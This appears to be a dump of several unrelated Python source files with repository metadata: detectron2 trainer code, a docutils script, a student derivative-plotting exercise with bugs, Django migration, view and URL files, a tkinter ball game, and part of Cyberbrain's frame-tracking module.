        # Test-time resize: shortest edge to MIN_SIZE_TEST, capped at MAX_SIZE_TEST.
        self.aug = T.ResizeShortestEdge(
            [cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST
        )
        self.input_format = cfg.INPUT.FORMAT
        assert self.input_format in ["RGB", "BGR"], self.input_format
    def __call__(self, original_image):
        """
        Args:
            original_image (np.ndarray): an image of shape (H, W, C) (in BGR order).
        Returns:
            predictions (dict):
                the output of the model for one image only.
                See :doc:`/tutorials/models` for details about the format.
        """
        with torch.no_grad():  # https://github.com/sphinx-doc/sphinx/issues/4258
            # Apply pre-processing to image.
            if self.input_format == "RGB":
                # whether the model expects BGR inputs or RGB
                original_image = original_image[:, :, ::-1]
            height, width = original_image.shape[:2]
            image = self.aug.get_transform(original_image).apply_image(original_image)
            # HWC -> CHW float32 tensor.
            image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1))
            inputs = {"image": image, "height": height, "width": width}
            predictions = self.model([inputs])[0]
            return predictions
class DefaultTrainer(TrainerBase):
"""
A trainer with default training logic. It does the following:
1. Create a :class:`SimpleTrainer` using model, optimizer, dataloader
defined by the given config. Create a LR scheduler defined by the config.
2. Load the last checkpoint or `cfg.MODEL.WEIGHTS`, if exists, when
`resume_or_load` is called.
3. Register a few common hooks defined by the config.
It is created to simplify the **standard model training workflow** and reduce code boilerplate
for users who only need the standard training workflow, with standard features.
It means this class makes *many assumptions* about your training logic that
may easily become invalid in a new research. In fact, any assumptions beyond those made in the
:class:`SimpleTrainer` are too much for research.
The code of this class has been annotated about restrictive assumptions it makes.
When they do not work for you, you're encouraged to:
1. Overwrite methods of this class, OR:
2. Use :class:`SimpleTrainer`, which only does minimal SGD training and
nothing else. You can then add your own hooks if needed. OR:
3. Write your own training loop similar to `tools/plain_train_net.py`.
See the :doc:`/tutorials/training` tutorials for more details.
Note that the behavior of this class, like other functions/classes in
this file, is not stable, since it is meant to represent the "common default behavior".
It is only guaranteed to work well with the standard models and training workflow in detectron2.
To obtain more stable behavior, write your own training logic with other public APIs.
Examples:
::
trainer = DefaultTrainer(cfg)
trainer.resume_or_load() # load last checkpoint or MODEL.WEIGHTS
trainer.train()
Attributes:
scheduler:
checkpointer (DetectionCheckpointer):
cfg (CfgNode):
"""
    def __init__(self, cfg):
        """
        Build model, optimizer, dataloader, scheduler and checkpointer from `cfg`.
        Args:
            cfg (CfgNode):
        """
        super().__init__()
        logger = logging.getLogger("detectron2")
        if not logger.isEnabledFor(logging.INFO):  # setup_logger is not called for d2
            setup_logger()
        # Rescale batch size / LR / schedule when cfg declares a REFERENCE_WORLD_SIZE.
        cfg = DefaultTrainer.auto_scale_workers(cfg, comm.get_world_size())
        # Assume these objects must be constructed in this order.
        model = self.build_model(cfg)
        optimizer = self.build_optimizer(cfg, model)
        data_loader = self.build_train_loader(cfg)
        # For training, wrap with DDP. But don't need this for inference.
        if comm.get_world_size() > 1:
            model = DistributedDataParallel(
                model, device_ids=[comm.get_local_rank()], broadcast_buffers=False
            )
        # AMPTrainer is used for mixed precision when SOLVER.AMP.ENABLED is set.
        self._trainer = (AMPTrainer if cfg.SOLVER.AMP.ENABLED else SimpleTrainer)(
            model, data_loader, optimizer
        )
        self.scheduler = self.build_lr_scheduler(cfg, optimizer)
        # Assume no other objects need to be checkpointed.
        # We can later make it checkpoint the stateful hooks
        self.checkpointer = DetectionCheckpointer(
            # Assume you want to save checkpoints together with logs/statistics
            model,
            cfg.OUTPUT_DIR,
            optimizer=optimizer,
            scheduler=self.scheduler,
        )
        self.start_iter = 0
        self.max_iter = cfg.SOLVER.MAX_ITER
        self.cfg = cfg
        self.register_hooks(self.build_hooks())
    def resume_or_load(self, resume=True):
        """
        If `resume==True` and `cfg.OUTPUT_DIR` contains the last checkpoint (defined by
        a `last_checkpoint` file), resume from the file. Resuming means loading all
        available states (eg. optimizer and scheduler) and update iteration counter
        from the checkpoint. ``cfg.MODEL.WEIGHTS`` will not be used.
        Otherwise, this is considered as an independent training. The method will load model
        weights from the file `cfg.MODEL.WEIGHTS` (but will not load other states) and start
        from iteration 0.
        Args:
            resume (bool): whether to do resume or not
        """
        checkpoint = self.checkpointer.resume_or_load(self.cfg.MODEL.WEIGHTS, resume=resume)
        if resume and self.checkpointer.has_checkpoint():
            self.start_iter = checkpoint.get("iteration", -1) + 1
            # The checkpoint stores the training iteration that just finished, thus we start
            # at the next iteration (or iter zero if there's no checkpoint).
        if isinstance(self.model, DistributedDataParallel):
            # broadcast loaded data/model from the first rank, because other
            # machines may not have access to the checkpoint file
            if TORCH_VERSION >= (1, 7):
                self.model._sync_params_and_buffers()
            # Take rank 0's start iteration so all workers agree.
            self.start_iter = comm.all_gather(self.start_iter)[0]
    def build_hooks(self):
        """
        Build a list of default hooks, including timing, evaluation,
        checkpointing, lr scheduling, precise BN, writing events.
        Returns:
            list[HookBase]:
        """
        cfg = self.cfg.clone()
        cfg.defrost()
        cfg.DATALOADER.NUM_WORKERS = 0  # save some memory and time for PreciseBN
        # NOTE: the list may contain a trailing None entry when PreciseBN is
        # disabled or the model has no BN modules.
        ret = [
            hooks.IterationTimer(),
            hooks.LRScheduler(),
            hooks.PreciseBN(
                # Run at the same freq as (but before) evaluation.
                cfg.TEST.EVAL_PERIOD,
                self.model,
                # Build a new data loader to not affect training
                self.build_train_loader(cfg),
                cfg.TEST.PRECISE_BN.NUM_ITER,
            )
            if cfg.TEST.PRECISE_BN.ENABLED and get_bn_modules(self.model)
            else None,
        ]
        # Do PreciseBN before checkpointer, because it updates the model and need to
        # be saved by checkpointer.
        # This is not always the best: if checkpointing has a different frequency,
        # some checkpoints may have more precise statistics than others.
        if comm.is_main_process():
            ret.append(hooks.PeriodicCheckpointer(self.checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD))
        def test_and_save_results():
            # Stores results so train() can verify them at the end.
            self._last_eval_results = self.test(self.cfg, self.model)
            return self._last_eval_results
        # Do evaluation after checkpointer, because then if it fails,
        # we can use the saved checkpoint to debug.
        ret.append(hooks.EvalHook(cfg.TEST.EVAL_PERIOD, test_and_save_results))
        if comm.is_main_process():
            # Here the default print/log frequency of each writer is used.
            # run writers in the end, so that evaluation metrics are written
            ret.append(hooks.PeriodicWriter(self.build_writers(), period=20))
        return ret
    def build_writers(self):
        """
        Build a list of writers to be used using :func:`default_writers()`.
        If you'd like a different list of writers, you can overwrite it in
        your trainer.
        Returns:
            list[EventWriter]: a list of :class:`EventWriter` objects.
        """
        # Delegates to the module-level default_writers() factory.
        return default_writers(self.cfg.OUTPUT_DIR, self.max_iter)
    def train(self):
        """
        Run training.
        Returns:
            OrderedDict of results, if evaluation is enabled. Otherwise None.
        """
        super().train(self.start_iter, self.max_iter)
        if len(self.cfg.TEST.EXPECTED_RESULTS) and comm.is_main_process():
            # _last_eval_results is stored by the EvalHook registered in build_hooks.
            assert hasattr(
                self, "_last_eval_results"
            ), "No evaluation results obtained during training!"
            verify_results(self.cfg, self._last_eval_results)
            return self._last_eval_results
    def run_step(self):
        # Delegate one optimization step to the wrapped (AMP/Simple) trainer,
        # keeping its iteration counter in sync with ours.
        self._trainer.iter = self.iter
        self._trainer.run_step()
    @classmethod
    def build_model(cls, cfg):
        """
        Returns:
            torch.nn.Module:
        It now calls :func:`detectron2.modeling.build_model`.
        Overwrite it if you'd like a different model.
        """
        model = build_model(cfg)
        logger = logging.getLogger(__name__)
        # Logged once so the full architecture appears in the training log.
        logger.info("Model:\n{}".format(model))
        return model
    @classmethod
    def build_optimizer(cls, cfg, model):
        """
        Returns:
            torch.optim.Optimizer:
        It now calls :func:`detectron2.solver.build_optimizer`.
        Overwrite it if you'd like a different optimizer.
        """
        # Delegates to the default solver factory; override in a subclass to customize.
        return build_optimizer(cfg, model)
    @classmethod
    def build_lr_scheduler(cls, cfg, optimizer):
        """
        It now calls :func:`detectron2.solver.build_lr_scheduler`.
        Overwrite it if you'd like a different scheduler.
        """
        # Delegates to the default solver factory; override in a subclass to customize.
        return build_lr_scheduler(cfg, optimizer)
    @classmethod
    def build_train_loader(cls, cfg):
        """
        Returns:
            iterable
        It now calls :func:`detectron2.data.build_detection_train_loader`.
        Overwrite it if you'd like a different data loader.
        """
        # Delegates to the default data-loader factory; override to customize.
        return build_detection_train_loader(cfg)
    @classmethod
    def build_test_loader(cls, cfg, dataset_name):
        """
        Returns:
            iterable
        It now calls :func:`detectron2.data.build_detection_test_loader`.
        Overwrite it if you'd like a different data loader.
        """
        # Delegates to the default data-loader factory; override to customize.
        return build_detection_test_loader(cfg, dataset_name)
    @classmethod
    def build_evaluator(cls, cfg, dataset_name):
        """
        Returns:
            DatasetEvaluator or None
        It is not implemented by default.
        """
        # Intentionally abstract: `test()` catches this NotImplementedError and
        # skips evaluation for datasets without an evaluator.
        raise NotImplementedError(
            """
If you want DefaultTrainer to automatically run evaluation,
please implement `build_evaluator()` in subclasses (see train_net.py for example).
Alternatively, you can call evaluation functions yourself (see Colab balloon tutorial for example).
"""
        )
    @classmethod
    def test(cls, cfg, model, evaluators=None):
        """
        Args:
            cfg (CfgNode):
            model (nn.Module):
            evaluators (list[DatasetEvaluator] or None): if None, will call
                :meth:`build_evaluator`. Otherwise, must have the same length as
                ``cfg.DATASETS.TEST``.
        Returns:
            dict: a dict of result metrics
        """
        logger = logging.getLogger(__name__)
        if isinstance(evaluators, DatasetEvaluator):
            evaluators = [evaluators]  # allow passing a single evaluator
        if evaluators is not None:
            assert len(cfg.DATASETS.TEST) == len(evaluators), "{} != {}".format(
                len(cfg.DATASETS.TEST), len(evaluators)
            )
        results = OrderedDict()
        for idx, dataset_name in enumerate(cfg.DATASETS.TEST):
            data_loader = cls.build_test_loader(cfg, dataset_name)
            # When evaluators are passed in as arguments,
            # implicitly assume that evaluators can be created before data_loader.
            if evaluators is not None:
                evaluator = evaluators[idx]
            else:
                try:
                    evaluator = cls.build_evaluator(cfg, dataset_name)
                except NotImplementedError:
                    logger.warn(
                        "No evaluator found. Use `DefaultTrainer.test(evaluators=)`, "
                        "or implement its `build_evaluator` method."
                    )
                    results[dataset_name] = {}
                    continue
            results_i = inference_on_dataset(model, data_loader, evaluator)
            results[dataset_name] = results_i
            if comm.is_main_process():
                assert isinstance(
                    results_i, dict
                ), "Evaluator must return a dict on the main process. Got {} instead.".format(
                    results_i
                )
                logger.info("Evaluation results for {} in csv format:".format(dataset_name))
                print_csv_format(results_i)
        if len(results) == 1:
            # Single test dataset: return its metrics dict directly.
            results = list(results.values())[0]
        return results
    @staticmethod
    def auto_scale_workers(cfg, num_workers: int):
        """
        When the config is defined for certain number of workers (according to
        ``cfg.SOLVER.REFERENCE_WORLD_SIZE``) that's different from the number of
        workers currently in use, returns a new cfg where the total batch size
        is scaled so that the per-GPU batch size stays the same as the
        original ``IMS_PER_BATCH // REFERENCE_WORLD_SIZE``.

        Other config options are also scaled accordingly:
        * training steps and warmup steps are scaled inverse proportionally.
        * learning rate are scaled proportionally, following :paper:`ImageNet in 1h`.

        For example, with the original config like the following:

        .. code-block:: yaml

            IMS_PER_BATCH: 16
            BASE_LR: 0.1
            REFERENCE_WORLD_SIZE: 8
            MAX_ITER: 5000
            STEPS: (4000,)
            CHECKPOINT_PERIOD: 1000

        When this config is used on 16 GPUs instead of the reference number 8,
        calling this method will return a new config with:

        .. code-block:: yaml

            IMS_PER_BATCH: 32
            BASE_LR: 0.2
            REFERENCE_WORLD_SIZE: 16
            MAX_ITER: 2500
            STEPS: (2000,)
            CHECKPOINT_PERIOD: 500

        Note that both the original config and this new config can be trained on 16 GPUs.
        It's up to user whether to enable this feature (by setting ``REFERENCE_WORLD_SIZE``).

        Returns:
            CfgNode: a new config. Same as original if ``cfg.SOLVER.REFERENCE_WORLD_SIZE==0``.
        """
        old_world_size = cfg.SOLVER.REFERENCE_WORLD_SIZE
        # Feature disabled (0) or already at the reference size: nothing to do.
        if old_world_size == 0 or old_world_size == num_workers:
            return cfg
        # Work on a copy; temporarily defrost so the fields can be mutated, and
        # restore the frozen state before returning.
        cfg = cfg.clone()
        frozen = cfg.is_frozen()
        cfg.defrost()

        assert (
            cfg.SOLVER.IMS_PER_BATCH % old_world_size == 0
        ), "Invalid REFERENCE_WORLD_SIZE in config!"
        scale = num_workers / old_world_size
        # Batch size and LR scale up with workers; iteration-based quantities
        # scale down (rounded, so slight drift is possible for odd ratios).
        bs = cfg.SOLVER.IMS_PER_BATCH = int(round(cfg.SOLVER.IMS_PER_BATCH * scale))
        lr = cfg.SOLVER.BASE_LR = cfg.SOLVER.BASE_LR * scale
        max_iter = cfg.SOLVER.MAX_ITER = int(round(cfg.SOLVER.MAX_ITER / scale))
        warmup_iter = cfg.SOLVER.WARMUP_ITERS = int(round(cfg.SOLVER.WARMUP_ITERS / scale))
        cfg.SOLVER.STEPS = tuple(int(round(s / scale)) for s in cfg.SOLVER.STEPS)
        cfg.TEST.EVAL_PERIOD = int(round(cfg.TEST.EVAL_PERIOD / scale))
        cfg.SOLVER.CHECKPOINT_PERIOD = int(round(cfg.SOLVER.CHECKPOINT_PERIOD / scale))
        cfg.SOLVER.REFERENCE_WORLD_SIZE = num_workers  # maintain invariant
        logger = logging.getLogger(__name__)
        logger.info(
            f"Auto-scaling the config to batch_size={bs}, learning_rate={lr}, "
            f"max_iter={max_iter}, warmup={warmup_iter}."
        )

        if frozen:
            cfg.freeze()
        return cfg
# Access basic attributes from the underlying trainer
# Each attribute becomes a read/write property on DefaultTrainer that forwards
# to self._trainer. The `x=_attr` default argument binds the current loop value
# at lambda-definition time, avoiding the classic late-binding closure bug.
for _attr in ["model", "data_loader", "optimizer"]:
    setattr(
        DefaultTrainer,
        _attr,
        property(
            # getter
            lambda self, x=_attr: getattr(self._trainer, x),
            # setter
            lambda self, value, x=_attr: setattr(self._trainer, x, value),
        ),
    )
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
7bf3cd6349e900045b70d5067d841f9c263f9e28 | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/bin/rst2man.py | 349d495c52f4ce4e924826a8e3e02475f3a96e78 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/Users/kwon/PycharmProjects/3D_A2I/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ab48adc1e062d9080c5cb2145e3c5b78a51ebdd6 | f6078890ba792d5734d289d7a0b1d429d945a03a | /mid-term/chapmanbrendan/chapmanbrendan_26691_1312276_Q3.py | 299fe01f6c53025391c5faf4bf7e5800e3c4c29f | [] | no_license | huazhige/EART119_Lab | 1c3d0b986a0f59727ee4ce11ded1bc7a87f5b7c0 | 47931d6f6a2c7bc053cd15cef662eb2f2027712c | refs/heads/master | 2020-05-04T23:40:53.709217 | 2019-06-11T18:30:45 | 2019-06-11T18:30:45 | 179,552,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,818 | py | # -*- coding: utf-8 -*-
"""
Created on Wed May 8 08:24:43 2019
@author: blchapma
"""
#============================================================================
"Packages"
#============================================================================
import numpy as np
import matplotlib.pyplot as plt
#============================================================================
"Variables"
#============================================================================
mData = np.loadtxt('E:\EAR119\Python Scripts\midterm_dydx.txt').T
a_t, a_y = mData[0], mData[1]
#===================================================================================
# derivatives
#===================================================================================
N = len( a_t)
dt = a_t[1]-a_t[0]
a_vel = (a_y[2::] - a_y[0:-2])/(2*dt)
a_acc = (a_y[2::] - 2*a_y[1:-1] + a_y[0:-2])/(dt**2)
# add zeros at beginning and end for plotting purposes
a_vel = np.hstack( (0,a_vel, 0))
a_acc = np.hstack( (0,a_acc, 0))
for i in range( 1, N-1):
a_vel[i] = ( a_y[i+1] - a_y[i-1])/(2*dt)
a_acc[i] = ( a_y[i+1] - 2*a_y[i] + a_y[i-1])/(dt**2)
else: # vectorized solution
y = 0
# From Week 2:
i = 1
while y[i] > y[i-1]:
largest_height = y[i]
i += 1
#===================================================================================
# plots
#===================================================================================
t_maxHeight = a_t[i]
print "The largest height achieved was %f m" % (largest_height), ' at t =', t_maxHeight
# We might also like to plot the path again just to compare
plt.figure()
plt.subplot( 311)
plt.plot( a_t, a_y)
plt.plot( [t_maxHeight], a_y[a_t == t_maxHeight], 'r*')
plt.ylabel('Height (m)')
plt.grid( True)
plt.subplot( 312)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_vel[1:-1])
# peak height at v = 0
plt.plot( [t_maxHeight], a_vel[a_t == t_maxHeight], 'r*')
plt.ylabel('Velocity (m/s)')
plt.grid( True)
plt.subplot( 313)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_acc[1:-1])
plt.xlabel('Time (s)')
plt.ylabel('Acceleration (m/s2)')
plt.ylim( -g - 5, -g+5)
plt.grid( True)
plt.show()
#============================================================================
"Image"
#============================================================================
plt.savefig("Q1", dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format="PNG",
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
plt.show()
#============================================================================ | [
"hge2@ucsc.edu"
] | hge2@ucsc.edu |
1b84faef65cc22245c96450dcbadae2ec6e81808 | 05725c7af76fd87d94cf424ef7d66efa50ac0bae | /mysite/exam/migrations/0008_auto_20200529_0948.py | 0d2407fdaef56b2c25e7ab300a64fb37490869b2 | [] | no_license | zhuzemin/questionnaire | 759ff2a9f14062f4cc03782269e8c17222a5b778 | 473a17bb0eb6fadeef0884df61d456d8bbb43259 | refs/heads/master | 2022-11-07T08:32:42.741511 | 2020-07-01T07:04:24 | 2020-07-01T07:04:24 | 276,302,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # Generated by Django 3.0.6 on 2020-05-29 01:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds optional start/finish timestamps to
    # Exam and makes `logtime` default to the current time. Avoid hand-editing
    # the operations; generate a new migration instead.

    dependencies = [
        ('exam', '0007_exam_status'),
    ]

    operations = [
        migrations.AddField(
            model_name='exam',
            name='finishTime',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='exam',
            name='startTime',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='exam',
            name='logtime',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
    ]
| [
"gogs@fake.local"
] | gogs@fake.local |
ac5ba21305a500a9b7671ef57166bd48d55276cc | 93e5b82332af9f0d3e203d086e30794fb90a2086 | /ForKids/appendixb/ch14-game-over.py | 474538652bae3b7192201c20d918b5c516da7d26 | [] | no_license | swell1009/ex | cfaae0b5fe917f12416170dce60f7dea8194f368 | 29b274fb51adbdc43af6ebecaec89c97bc58be6f | refs/heads/master | 2020-04-04T10:15:20.578932 | 2018-11-22T06:27:30 | 2018-11-22T06:27:30 | 155,848,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,701 | py | from tkinter import *
import random
import time
class Ball:
    """A ball that bounces off the canvas walls and the paddle.

    Falling past the bottom edge sets ``hit_bottom``, which the main loop
    uses to end the game.
    """

    def __init__(self, canvas, paddle, color):
        self.canvas = canvas
        self.paddle = paddle
        self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
        self.canvas.move(self.id, 245, 100)
        # Pick a random non-zero horizontal speed; vertical speed starts upward.
        starts = [-3, -2, -1, 1, 2, 3]
        random.shuffle(starts)
        self.x = starts[0]
        self.y = -3
        self.canvas_width = self.canvas.winfo_width()
        self.canvas_height = self.canvas.winfo_height()
        self.hit_bottom = False

    def hit_paddle(self, pos):
        """Return True when *pos* (the ball's bounding box) overlaps the paddle."""
        left, _top, right, bottom = pos
        p_left, p_top, p_right, p_bottom = self.canvas.coords(self.paddle.id)
        overlaps_horizontally = right >= p_left and left <= p_right
        touches_vertically = p_top <= bottom <= p_bottom
        return overlaps_horizontally and touches_vertically

    def draw(self):
        """Advance the ball one animation step, rebounding off walls/paddle."""
        self.canvas.move(self.id, self.x, self.y)
        bbox = self.canvas.coords(self.id)
        if bbox[1] <= 0:
            self.y = 3
        if self.hit_paddle(bbox):
            self.y = -3
        if bbox[3] >= self.canvas_height:
            self.hit_bottom = True
        if bbox[0] <= 0:
            self.x = 3
        if bbox[2] >= self.canvas_width:
            self.x = -3
class Paddle:
    """The player-controlled paddle.

    Arrow keys steer it left/right; the first mouse click flips ``started``,
    which the main loop uses to begin animating.
    """

    def __init__(self, canvas, color):
        self.canvas = canvas
        self.id = canvas.create_rectangle(0, 0, 100, 10, fill=color)
        self.canvas.move(self.id, 200, 300)
        self.x = 0
        self.canvas_width = self.canvas.winfo_width()
        self.started = False
        self.canvas.bind_all('<KeyPress-Left>', self.turn_left)
        self.canvas.bind_all('<KeyPress-Right>', self.turn_right)
        self.canvas.bind_all('<Button-1>', self.start_game)

    def draw(self):
        """Move horizontally, stopping dead at either canvas edge."""
        self.canvas.move(self.id, self.x, 0)
        bbox = self.canvas.coords(self.id)
        if bbox[0] <= 0 or bbox[2] >= self.canvas_width:
            self.x = 0

    def turn_left(self, evt):
        self.x = -2

    def turn_right(self, evt):
        self.x = 2

    def start_game(self, evt):
        self.started = True
# Window setup: fixed-size, always-on-top game window with a 500x400 canvas.
tk = Tk()
tk.title("Game")
tk.resizable(0, 0)
tk.wm_attributes("-topmost", 1)
canvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)
canvas.pack()
tk.update()

paddle = Paddle(canvas, 'blue')
ball = Ball(canvas, paddle, 'red')
# Pre-created but hidden; revealed once the ball falls past the bottom edge.
game_over_text = canvas.create_text(250, 200, text='GAME OVER', state='hidden')

# Hand-rolled main loop (instead of tk.mainloop) so the game can animate at
# roughly 100 frames/s. Animation only runs after the first click and stops
# once the ball hits the bottom.
while 1:
    if ball.hit_bottom == False and paddle.started == True:
        ball.draw()
        paddle.draw()
    if ball.hit_bottom == True:
        time.sleep(1)
        canvas.itemconfig(game_over_text, state='normal')
    tk.update_idletasks()
    tk.update()
    time.sleep(0.01)
| [
"swell1009@qq.com"
] | swell1009@qq.com |
b69fc07f785607209aa5e7a0bc332aad97fe3e9f | 6b9888a32733bc9d67f290cd006fb4dca84bcaf1 | /experience/templatetags/__init__.py | a6baf38fdb4d35cc22ccbc86072c811995c6c2f1 | [] | no_license | Shatki/TanyaSite2.7 | a2008257a63134411139594c54473e88f21df8c0 | 69c7d6516d3d28dbe9370d94aacce0ac04070822 | refs/heads/master | 2020-04-30T02:31:10.274659 | 2019-03-27T19:41:59 | 2019-03-27T19:41:59 | 176,562,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from .filters import delays
| [
"Shatki@mail.ru"
] | Shatki@mail.ru |
230c7858868fd3f749ca0b020713498141986b25 | 9043da349ef0dde4cb6d819a69992274cac99125 | /app/views.py | 18d64f925ce07f531d717d8d30d40975dc5db33a | [] | no_license | zcoder/cantailme-server | e78529f5fa554ff2979215f21089068629aa1259 | 3940c4177ecca43aa78040b129aa29327a466c29 | refs/heads/master | 2021-01-16T21:07:35.372771 | 2012-07-10T18:17:40 | 2012-07-10T18:17:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | from django.shortcuts import get_object_or_404
from annoying.decorators import render_to
from app.models import TailSession
@render_to('app/index.html')
def index(request):
    """Index page"""
    # Empty context: app/index.html needs no data; @render_to renders the
    # template with whatever dict we return.
    return {}
@render_to('app/tail.html')
def tail(request, hash):
    """Render the tail page for the session identified by *hash* (404 if absent)."""
    session = get_object_or_404(TailSession, hash=hash)
    return {'session': session}
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
fb683de87b440fb79e7283fcdf4f67d2062f4338 | c4f0a0215956ff0c29ae491a10416a72c1ce654d | /nails_project/nails_project/accounts/urls.py | d27edda41f2e3ed2b138980e290a802ebb7219da | [] | no_license | borislavstoychev/my_exam | 1a2a499b2e6ac507641a9aad76576d49d4ac6a6d | 9c756f76679ad85697ff123c478b765656d4ce2d | refs/heads/main | 2023-07-13T12:49:40.116891 | 2021-08-25T08:54:44 | 2021-08-25T08:54:44 | 380,476,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | from django.urls import path
from nails_project.accounts import views
# Account routes: authentication, profile read/update/delete, and the
# e-mail activation callback (uidb64/token come from the activation link).
urlpatterns = (
    path('sign-in/', views.SignInView.as_view(), name='sign in user'),
    path('sign-out/', views.SignOutView.as_view(), name='sign out user'),
    path('sign-up/', views.SignUpView.as_view(), name='sign up user'),
    path('profile/<int:pk>/', views.ProfileUpdateView.as_view(), name='profile details'),
    path('delete/<int:pk>/', views.ProfileDeleteView.as_view(), name='profile delete'),
    path('activate/<uidb64>/<token>/', views.activate, name='activate'),
)
| [
"stoy4ew@gmail.com"
] | stoy4ew@gmail.com |
408b2759512d27d6ac6c858cf465b57ebc6a92ae | b67bcff47ed23af86edc27ea8bf8c4b24fd67434 | /cyberbrain/basis.py | 2c5bd59854b426b16202b843f6886116a431ef98 | [
"MIT"
] | permissive | vvoody/Cyberbrain | 3f0f0f671f18377566f32f5f5381ac9ab4a61bb9 | bac343b6e596d270d152e345ee74c2d0b8d265a2 | refs/heads/master | 2020-08-24T02:36:31.111072 | 2019-10-21T07:04:43 | 2019-10-21T07:04:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | """Some basic data structures used throughout the project."""
from collections import defaultdict
from enum import Enum
from typing import Dict, NamedTuple, Tuple, Union
# "surrounding" is a 2-element tuple (start_lineno, end_lineno), representing a
# logical line. Line number is frame-wise.
#
# For single-line statement, start_lineno = end_lineno, and is the line number of the
# physical line returned by get_lineno_from_lnotab.
#
# For multiline statement, start_lineno is the line number of the first physical line,
# end_lineno is the last. Lines from start_lineno to end_lineno -1 should end with
# token.NL(or tokenize.NL before 3.7), line end_lineno should end with token.NEWLINE.
#
# Example:
# 0 a = true
# 1 a = true
# 2 b = {
# 3 'foo': 'bar'
# 4 }
# 5 c = false
#
# For the assignment of b, start_lineno = 2, end_lineno = 4
Surrounding = NamedTuple("Surrounding", [("start_lineno", int), ("end_lineno", int)])
SourceLocation = NamedTuple("SourceLocation", [("filepath", str), ("lineno", int)])
_dummy = object()
class NodeType(Enum):
    """Discriminates the kinds of nodes tracked during tracing."""

    LINE = 1  # a plain executed line
    CALL = 2  # a function call site
class FrameID:
    """Class that represents a frame.

    Basically, a frame id is just a tuple, where each element represents the frame index
    within the same parent frame. For example, consider this snippet:

        def f(): g()
        def g(): pass
        f()
        f()

    Assuming the frame id for global frame is (0,). We called f two times with two
    frames (0, 0) and (0, 1). f calls g, which also generates two frames (0, 0, 0) and
    (0, 1, 0). By comparing prefixes, it's easy to know whether one frame is the parent
    frame of the other.

    We also maintain the frame id of current code location. New frame ids are generated
    based on event type and current frame id.

    TODO: record function name.
    """

    # Frame id tuple of the location currently executing (class-wide state,
    # mutated by `create`).
    current_ = (0,)

    # Mapping from parent frame id to max child frame index.
    child_index: Dict[Tuple, int] = defaultdict(int)

    def __init__(self, frame_id_tuple: Tuple[int, ...], co_name: str = ""):
        self._frame_id_tuple = frame_id_tuple
        self.co_name = co_name

    def __eq__(self, other: Union["FrameID", Tuple[int, ...]]):
        # Equality is defined against both FrameID instances and raw tuples.
        # NOTE(review): `isinstance(other, Tuple)` uses typing.Tuple, which is
        # deprecated as an isinstance target in newer Pythons — confirm the
        # supported interpreter versions.
        if isinstance(other, FrameID):
            return self._frame_id_tuple == other._frame_id_tuple
        return isinstance(other, Tuple) and self._frame_id_tuple == other

    def __hash__(self):
        return hash(self._frame_id_tuple)

    def __add__(self, other: Tuple):
        # Appending indices produces a descendant frame id.
        return FrameID(self._frame_id_tuple + other)

    @property
    def tuple(self):
        return self._frame_id_tuple

    @classmethod
    def current(cls):
        # Snapshot of the class-wide current location as a FrameID.
        return FrameID(cls.current_)

    @property
    def parent(self):
        return FrameID(self._frame_id_tuple[:-1])

    def is_child_of(self, other):
        # NOTE(review): despite the name, this tests full-id equality via
        # __eq__, not a prefix relationship as the class docstring suggests.
        # Confirm whether `self.parent == other` was intended.
        return other == self._frame_id_tuple

    def is_parent_of(self, other):
        # NOTE(review): same concern as is_child_of — this is equality, not a
        # prefix test.
        return self == other._frame_id_tuple

    @classmethod
    def create(cls, event: str):
        # State machine driven by sys.settrace-style events:
        #   line   -> stay in the current frame;
        #   call   -> descend into a new child frame (callsite is the caller's);
        #   return -> pop back to the parent and bump its child counter so the
        #             next call gets a fresh index.
        assert event in {"line", "call", "return"}
        if event == "line":
            return cls.current()
        if event == "call":
            frame_id = cls.current()
            cls.current_ = cls.current_ + (cls.child_index[cls.current_],)
            return frame_id  # callsite is in caller frame.
        if event == "return":
            call_frame = cls.current()
            cls.current_ = cls.current_[:-1]
            # After exiting call frame, increments call frame's child index.
            cls.child_index[cls.current_] += 1
            return call_frame

    def __str__(self):
        """Prints the tuple representation."""
        return f"{str(self._frame_id_tuple)} {self.co_name}"
class ID(str):
    """A string subclass that represents an identifier.

    There's no need to save frame info, because at a certain time, a
